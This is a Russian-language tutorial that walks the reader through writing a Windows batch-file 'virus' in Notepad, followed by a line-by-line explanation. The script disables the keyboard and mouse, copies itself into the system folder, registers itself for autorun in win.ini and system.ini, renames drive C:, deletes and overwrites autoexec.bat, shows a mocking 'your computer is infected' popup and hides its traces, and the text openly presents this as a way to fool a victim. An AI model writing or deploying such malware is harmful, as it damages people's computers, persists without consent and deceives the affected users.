Открываем блокнот и вводим команды:
1 echo off 2 rundll32 keyboard,disable 3 rundll32 mouse,disable 4 copy 0 %windir/system 5 echo run=%windir%/system/.bat >> win.ini 6 echo run=%windir%/system/.bat >> system.ini 7 label LOHOLAMMER 8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r 9 deltree /y c:\autoexec.bat > nul
10 echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat 11 rundll32 mouse,enable 12 rundll32 keyboard,enable 13 echo var WSHShell = WScript.CreateObject("WScript.Shell”); > temp\mes.js echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> temp\mes.js start temp\mes.js deltree /y temp\mes.js 14 attrib c:\autoexec.bat +h +s +a +r 15 pause 16 cls -------------------------------------------------------------------------------------------------------- 1 echo off – Запрещаем ДОСовскому окошку показывать, что делает скрипт. 2 rundll32 keyboard,disable – Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C 3 rundll32 mouse,disable – Отключаем мышь тоже на всякий. 4 copy 0 %windir/system – Копируемся в папку windows/system // 0 – Переменная, указывающая на исходный файл-вирус // %windir – переменная папка масдая. 5 echo run=%windir%/system/.bat >> windir\win.ini – Добавляет текст "run=%windir%/system/.bat" в файл win.ini 6 echo run=%windir%/system/.bat >> windir\system.ini – Добавляет текст "run=%windir%/system/.bat" в файл system.ini 7 label LOHOLAMMER – Меняет имя диску c:\ на "LOHOLAMMER” 8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r – Проверяем если есть файл c:\autoexec.bat то убираем //у него атрибуты -h -s -a -r 9 deltree /y c:\autoexec.bat – Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл. 10 echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat – Добавить текст "YOU ARE LAMMER…xe-xe-xe” //в новый файл autoexec.bat 11 rundll32 mouse,enable – Включаем, пускай думает, что ниче не было. 12 rundll32 keyboard,enable – Включаем, пускай думает, что ниче не было. 13 echo var WSHShell = WScript.CreateObject("WScript.Shell”); > temp\mes.js echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> temp\mes.js start temp\mes.js. //Этот текст выводит масдайное окно с надписью deltree /y temp\mes.js //А потом стирает за собой следы. 14 attrib c:\autoexec.bat +h +s +a +r – Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил. 15 pause – Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.) 16 cls – Выходим
Потом для сохранения вируса вам надо место формата блокнота .txt поменять на .bat
|